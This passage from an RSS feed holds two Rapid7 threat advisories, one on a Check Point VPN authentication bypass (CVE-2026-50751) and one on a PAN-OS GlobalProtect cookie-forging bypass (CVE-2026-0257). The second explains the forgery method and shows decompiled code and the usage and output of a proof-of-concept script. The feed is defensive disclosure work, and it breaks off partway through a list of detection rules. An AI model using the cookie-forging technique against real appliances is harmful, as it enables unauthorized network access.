      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 8, 2026, Check Point </span><a href="https://support.checkpoint.com/results/sk/sk185033"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-50751"><span style='font-size: undefined;'>CVE-2026-50751</span></a><span style='font-size: undefined;'>, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN, Mobile Access, and Spark Firewall products. The vulnerability affects deployments configured to use the deprecated IKEv1 key exchange protocol where gateways accept legacy Remote Access clients and do not require a machine certificate for connections.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-50751, classified as improper authentication (</span><a href="https://cwe.mitre.org/data/definitions/287.html"><span style='font-size: undefined;'>CWE-287</span></a><span style='font-size: undefined;'>), has a CVSS score of 9.3. The vulnerability stems from a logic flow weakness in how Remote Access and Mobile Access components validate certificates during IKEv1 key exchange; successful exploitation allows an unauthenticated attacker to establish a VPN session without providing valid credentials. Per the vendor, additional post-authentication activity is required to access internal resources or escalate privileges.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has indicated that CVE-2026-50751 is being actively exploited in the wild, with observed activity dating back to May 7, 2026 and an increase in early June. The vendor characterizes the campaign as limited in scope, affecting several dozen organizations. At least one incident has been linked to a Qilin ransomware affiliate, which Check Point assesses with medium confidence. </span>Rapid7 has observed two cases with high confidence that can be attributed to CVE-2026-50751. As of June 8, 2026,  this vulnerability has been added to the CISA KEV.</p><p style="direction: ltr;"><span style='font-size: undefined;'>Separately, during its investigation Check Point identified a related vulnerability, </span><a href="https://support.checkpoint.com/results/sk/sk185035"><span style='font-size: undefined;'>CVE-2026-50752</span></a><span style='font-size: undefined;'> (CVSS 7.4), in the same IKEv1 code path that could enable a man-in-the-middle attack against site-to-site VPN tunnels under certain configurations. No exploitation of CVE-2026-50752 has been observed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point VPN products have been targeted by zero-day vulnerabilities in the </span><a href="https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/"><span style='font-size: undefined;'>past</span></a><span style='font-size: undefined;'>. In May 2024, </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24919"><span style='font-size: undefined;'>CVE-2024-24919</span></a><span style='font-size: undefined;'>, a high-severity information disclosure vulnerability in Check Point Quantum Security Gateways, was exploited in the wild and subsequently added to the CISA Known Exploited Vulnerabilities (KEV) catalog. Organizations running affected Check Point products are urged to apply the available hot fixes and follow the vendor guidance to remediate these issues.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has released hotfixes to remediate CVE-2026-50751. Affected organizations should apply the available updates on an emergency basis, without waiting for a regular patch cycle to occur.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following products and versions are affected (Remote Access VPN, Mobile Access / SSL VPN, Spark Firewall):</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.20.X</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.40</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10.X</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.20</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.00.X</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.10</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Notably, four of the nine affected version branches (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.20.X</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.40</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'>) have reached End of Support. Organizations still running these versions should prioritize migration to a supported release.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For organizations unable to immediately apply the hotfix, Check Point has provided the following alternative mitigations:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Remove support for the legacy remote access client</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Configure global properties for Remote Access VPN authentication to IKEv2 only</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Set machine certificate authentication as mandatory</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Enable IPS and download the latest signatures</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 strongly recommends looking for signs of compromise even after the hotfix has been applied. Per Check Point's advisory, incident response teams should prioritize forensic log audits and configuration reviews starting from May 7, 2026, the earliest known date of exploitation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://support.checkpoint.com/results/sk/sk185033"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3>Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-50751 with a vulnerability check available in the June 9 content release.</span></p><h3>Intelligence Hub</h3><p style="direction: ltr;"><span style='font-size: undefined;'>IntelHub customers can look into the platform to search for more details and correlate the indicators of compromise, like known malicious IPs and known post exploitation ELF payloads, with the data from their own environment.</span></p><h3>Managed Detection Response (MDR)</h3><p>The following detection rules are available for InsightIDR and Managed Detection Response (MDR) customers:</p><ul><li><p>Suspicious Network Connection - Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)</p></li><li><p>Suspicious Process - Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)</p></li></ul><h2 style="direction: ltr;">Indicators of compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has published the following indicators associated with the CVE-2026-50751 exploitation campaign. The attacker infrastructure consists of VPS hosts from several providers (Kaupo Cloud HK, Shock Hosting, Vultr Holdings), and Check Point notes that in some cases, the VPS region matched the geography of the targeted organization.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>IP addresses:</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.77.149[.]152</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>209.182.225[.]136</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.60.157[.]139</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>162.33.177[.]101</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.76.26[.]42</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>144.208.127[.]155</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.54.88[.]201</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>38.54.107[.]167</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>66.42.99[.]200</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>File hashes (MD5):</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>52fda5c1b9704544f32ee98d9060e689</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>51d39aa39478beeac94f2d12f682ecce</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point observed post-exploitation attempts to retrieve ELF payloads from attacker-controlled servers, and identified ties to the Qilin ransomware operation based on binary analysis. For the full and most current list of IOCs, please refer to the </span><a href="https://blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 8, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>June 8, 2026</strong></span>: Rapid 7 observations of EITW.</li><li><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 9, 2026: </strong></span><span style='font-size: undefined;'>CVE added to CISA KEV.</span></p></li><li><span style='font-size: undefined;'><strong>June 10, 2026: </strong></span><span style='font-size: undefined;'>Updated to reflect availability of a vulnerability check and information for Intelligence Hub customers. </span></li><li><span style='font-size: undefined;'><strong>June 11, 2026: </strong></span><span style='font-size: undefined;'>Additional exploitation information determined by Rapid7.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751</link>
      <guid isPermaLink="false">bltcf427fa6ec355a76</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 08 Jun 2026 17:05:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Observed Exploitation of PAN-OS GlobalProtect Authentication Bypass Vulnerability (CVE-2026-0257)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On May 13, 2026, Palo Alto Networks published a security </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for CVE-2026-0257, a medium severity authentication bypass affecting PAN-OS and Prisma Access when a specific configuration is present. Successful exploitation of this vulnerability allows a remote unauthenticated attacker to successfully establish a VPN connection through the GlobalProtect gateway of an affected appliance.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR identified successful exploitation across numerous customers, however we did not observe any indication of successful lateral movement from the devices. The earliest date for observed exploitation was May 17, 2026.  As of May 29, 2026,  this vulnerability has been added to the CISA KEV.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The CVE was originally assigned a CVSSv4 score of 4.7, </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N/E:U/AU:N/R:A/V:D/RE:M/U:Amber"><span style='font-size: undefined;'>medium</span></a><span style='font-size: undefined;'> severity. Due to the circumstances surrounding this vulnerability Rapid7 urges that organizations treat this as a critical vulnerability. An authentication bypass in an edge facing enterprise VPN appliance can have significant impact to affected organizations. As such, organizations running affected appliances are urged to upgrade to a vendor supplied patch on an urgent basis.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Note that, as of May 29, Palo Alto Networks updated their security </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> to reflect a change in the CVSS score. The CVSSv4 score was changed from 4.7 to 7.8, with high severity to inform their customers to patch with the highest urgency. </span></p><h2 style="direction: ltr;">Observed Attacker Behavior</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On 2026-05-18 01:51:37 UTC, Rapid7 MDR responded to a 'Suspicious VPN Authentication - Local Account Logon via Generic Non-Human Identity' alert. During the initial investigation, Rapid7 observed a suspicious cookie authentication to the local admin account across multiple customer environments from the same hosting provider, Vultr.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="html">&lt;14&gt;May 18 01:51:37 palovpn-01 1,2026/05/18 01:51:37,010101010101,GLOBALPROTECT,0,2817,2026/05/18 01:51:37,vsys1,gateway-auth,login,Cookie,,admin,US,GP-CLIENT,104.207.144.154,0.0.0,0.0.0.0,0.0.0.0,aa:bb:cc:dd:ee:ff,,6.0.0,,Linux,"linux-64",1,,,"Auth latency: 78ms, profile: local_auth_profile",success,,0,,0,GP-Gateway,0101010101010101010,0x0,2026-05-18T01:51:37.264-05:00,,,,,,0,0,0,0,,palovpn-01,1,",</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>GlobalProtect Authentication Log</em></span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR analyzed the Palo Alto tech support files across the impacted customers and observed that Cloud Authentication Service (CAS) was disabled and the GlobalProtect portal or gateway had authentication override cookies enabled. Based on these findings, MDR analysts concluded that this was likely exploitation of CVE-2026-0257. Subsequent analysis by Rapid7 Labs confirmed this was accurate by validating a successful proof-of-concept.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR observed a second wave of exploitation on May 21st. Due to the consistent MAC address, Rapid7 believes both waves of exploitation are likely from the same threat actor (TA). However, the second wave of compromises originated from the hosting provider, Dromatics Systems. In this wave of exploitation, Rapid7 observed VPN IP assignment following the cookie authentication, granting them access to the internal network. </span>Rapid7 observed POST requests to <span data-type='inlineCode'>/ssl-vpn/hipreport.esp</span> and <span data-type='inlineCode'>/ssl-vpn/getconfig.esp</span> in the cases where a VPN tunnel was successfully established. The first submits security profile information and the second to establish the secure tunnel.<span style='font-size: undefined;'> </span>Across multiple customers, Rapid7 observed successful exploitation via authentication probes using forged cookies, but the appliance accepted the cookie without a full VPN session being established in 8 out of 10 impacted MDR customers.</p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="html">&lt;14&gt;May 21 01:54:39 FW-PA-A 1,2026/05/21 01:54:38,010101010101,GLOBALPROTECT,0,2818,2026/05/21 01:54:38,vsys1,gateway-auth,login,Cookie,,admin,US,DESKTOP-GP01,146.19.216.125,0.0.0.0,0.0.0.0,0.0.0.0,aa:bb:cc:dd:ee:ff,,6.0.0,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Auth latency: 1019ms, profile: SAML-o365-GP",success,,0,,0,GlobalProtect_External_Gateway,0101010101010101010 ,0x8000000000000000,2026-05-21T01:54:39.142-05:00,,,,,,30,241,35,0,,FW-PA-A,1,,",</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>GlobalProtect Authentication Log</em></span></p><h2 style="direction: ltr;">Technical Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Per the vendor advisory, we know the issue lies in a feature called “authentication override”. This feature allows a GlobalProtect portal or gateway to issue cookies to an authenticated user. The authenticated user can then use an authentication override cookie in future communications to the GlobalProtect portal or gateway in lieu of re-authenticating via credentials, akin to a bearer token. This is not a feature that is enabled by default.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>We also know from reading the vendor advisory that the vulnerability requires a certain configuration in how certificates are used to encrypt and decrypt these authentication override cookies. Specifically, the certificate used to encrypt and decrypt authentication override cookies must not be the same certificate used for the GlobalProtect portal or gateway’s HTTPS service. This is a significant clue to how the vulnerability works.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>To explore what an authentication override cookie looks like and how they are created, we can look at the implementation in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/usr/local/bin/gpsvc</span></span><span style='font-size: undefined;'> binary which implements the GlobalProtect service (Our testing appliance was running PAN-OS </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.2.8</span></span><span style='font-size: undefined;'> in a vulnerable configuration). Inspecting the </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_DoAuthLogin</span></span><span style='font-size: undefined;'> function, we see that if a HTTP form value of either </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-userauthcookie</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-prelogonuserauthcookie</span></span><span style='font-size: undefined;'> is present during a POST request to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/ssl-vpn/login.esp</span></span><span style='font-size: undefined;'>, authentication will be performed by a call to </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_AuthWithCookie</span></span><span style='font-size: undefined;'>. This function will take the incoming encrypted cookie value stored in either </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-userauthcookie</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>portal-prelogonuserauthcookie</span></span><span style='font-size: undefined;'>, decrypt it and extract the cookies user name, domain name, host id, client OS, remote address, and timestamp (as auth override cookies have a lifetime after which they will expire).</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">void __gostk main_AuthWithCookie(
        main_GpTask_0 *t,
        paloaltonetworks_com_libs_common_AuthProfile *authProfile,
        string authCookie,
        string key,
        string stage,
        uint32 cookieLifetime,
        uint32 eventId,
        uint32 netMask,
        bool checkSrcIp,
        main_authResult_0 *result,
        string defaultDescription)
{
// ...

  ts = 0;
  errorCode = 0;
  user = 0;
  domain = 0;
  hostId = 0;
  clientOs = 0;
  remoteAddr = 0;
  result-&gt;retCode = 0;
  startTime = time_Now();
  result-&gt;cookie_auth_status = -1;
  t-&gt;Variables.authMethod.len = 6;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
    runtime_gcWriteBarrier();
else
t-&gt;Variables.authMethod.str = (uint8 *)"Cookie";
  str = authProfile-&gt;AuthProfileName.str;
  t-&gt;Variables.authProfile.len = authProfile-&gt;AuthProfileName.len;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
    runtime_gcWriteBarrier();
else
t-&gt;Variables.authProfile.str = str;
  v27 = main_DecryptAppAuthCookie(t, authCookie, key, &user, &domain, &hostId, &clientOs, &remoteAddr, &ts);</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>If we look at the </span><span style='font-size: undefined;'><span data-type='inlineCode'>main_DecryptAppAuthCookie</span></span><span style='font-size: undefined;'> function we can begin to see the problem. The incoming encrypted cookie is base64 decoded and then decrypted using a private key. The decrypted content is then trusted implicitly, with no signature verification of any kind occurring after decryption.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">error __gostk main_DecryptAppAuthCookie(
        main_GpTask_0 *t,
        string authCookie,
        string privateCert,
        string *user,
        string *domain,
        string *hostId,
        string *clientOs,
        string *remoteAddr,
        int64 *ts)
{
// ...

  if ( privateCert.len )
  {
    *(retval_95DD80 *)&text[48] = paloaltonetworks_com_libs_common_DecryptRsaPrivateWithBase64Std(
                                    privateCert,
                                    (string)0LL,
                                    authCookie);</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The implication here is that anyone who knows the public key for the certificate used by the authentication override feature to encrypt and decrypt cookies, can successfully forge and encrypt an arbitrary authentication override cookie. The question then becomes, how does an attacker learn the correct public key to use in this attack?</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>This brings us back to the vendor's advisory where they state “do not reuse the portal or gateway certificate, and do not share this certificate with other features or users”.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>If a GlobalProtect portal or gateway has reused the certificate for encrypting and decrypting cookies with another feature, such as the HTTPS service of the portal or gateway, then a remote unauthenticated attacker can discover the public key for that certificate. In doing so the attacker will be able to successfully forge and encrypt arbitrary authentication override cookies. As these forged cookies will be successfully decrypted server side, they will be trusted and an authentication bypass will be achieved. An attacker can use a valid forged authentication override cookie to login and establish a VPN connection.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to Exposure Command and InsightVM customers being able to assess their exposure with authenticated checks, a publicly available </span><a href="https://github.com/sfewer-r7/CVE-2026-0257"><span style='font-size: undefined;'>proof-of-concept script</span></a><span style='font-size: undefined;'> to test if an appliance is vulnerable to CVE-2026-0257 has been developed by Rapid7 Labs. The script will retrieve all certificates in the chain for the HTTPS service of either a GlobalProtect portal or gateway. Each certificate in the chain is iterated over and an authentication override cookie is forged using each certificate's public key. This forged cookie is then tested against the GlobalProtect portal or gateway, and the script reports back if authentication was successful or not. </span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The usage of the script is shown below.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID] [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).

options:
  -h, --help            show this help message and exit
  --target TARGET       Target GP portal/gateway IP/hostname
  --port PORT           Target port (default: 443)
  --user USER           Username to forge cookie for (default: admin)
  --domain DOMAIN       Domain for cookie (default: empty)
  --host-id HOST_ID     Host ID for cookie (default: empty)
  --client-os CLIENT_OS
                        Client OS for cookie (default: Windows)
  --client-ip CLIENT_IP
                        Client IP in cookie (default: 0.0.0.0)
  --context {gateway,portal,both}
                        Context to test: gateway, portal, or both (default target)
  --verbose             Print full response</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A successful invocation of the script against a vulnerable appliance is shown below. We can see the target's GlobalProtect gateway accepted a forged authentication override cookie using the second certificate in the chain.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 forge_cookie.py --target 192.168.86.99 --user haxor
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)

[*] Forging cookie for user 'haxor', testing each key

  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  [-] Failure - Portal did not accepted the forged cookie

  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: ng9ygxlaclylNXeSHcakXZPK06Fno0svVirz6RhRtA5mDmOaZyg/KMxUuM5lRvm1Rn1Z6vqaWQQPvQOHzwJnyldOmhUKy+HDMgIYtJ/kk3ypMqmFE7BbmPxnSKxKcQQbNIcxgkrhCwuJKwybuq0aaPVNzN9BSWmh1QmZj7oLjTEo9ExAXrm951mqYhh3+MgBCScaYqP23WzrC+vzqJB74sHoMUuFWIF8/sMYDMpvENOoI4nXAFCaRYSruW9FQQy5VTzNifNWkrYcdzDCXKiP8v4G098/2QoBbVoyHBZwbgHGBsRU3ZeSgoHjrhjxyotIshKVssUs8CRpuG2HlZBM0Q==</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>We can observe the successful authentication via the management interface, as shown below. The two initial failures correspond to the first certificate being used which was the incorrect certificate.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1913d15e22afec9d/6a19c11b937e6e3ee9aed268/pan-os-monitor-gpsrv.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="pan-os-monitor-gpsrv.png" asset-alt="pan-os-monitor-gpsrv.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1913d15e22afec9d/6a19c11b937e6e3ee9aed268/pan-os-monitor-gpsrv.png" data-sys-asset-uid="blt1913d15e22afec9d" data-sys-asset-filename="pan-os-monitor-gpsrv.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="pan-os-monitor-gpsrv.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 1: PAN-OS Management Interface</em></span></p><h2 style="direction: ltr;">Mitigation Guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>According to the Palo Alto Networks advisory, the following product versions are affected by CVE-2026-0257:</span></p><p></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Product</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unaffected</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.4-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.4-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.7</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h14</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.10-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h14</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.10-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.12</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.15</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.18-h6</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access 11.2.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h13</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h13</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access 10.2.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products must have the authentication override feature enabled in either the GlobalProtect portal or gateway, and must reuse the authentication override cookie encryption and decryption certificate with another feature in order to be vulnerable. As a mitigation, affected products should either disable the authentication override feature or generate a new certificate to use exclusively for the authentication override feature.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Please refer to the vendor </span><a href="https://security.paloaltonetworks.com/CVE-2026-0257"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the latest guidance.</span></p><h2 style="direction: ltr;">Rapid7 Customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Managed Detection Response (MDR)</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The following detection rules are available for InsightIDR and Managed Detection Response (MDR) customers:</span></p><ul><li style="direction: ltr;"><p 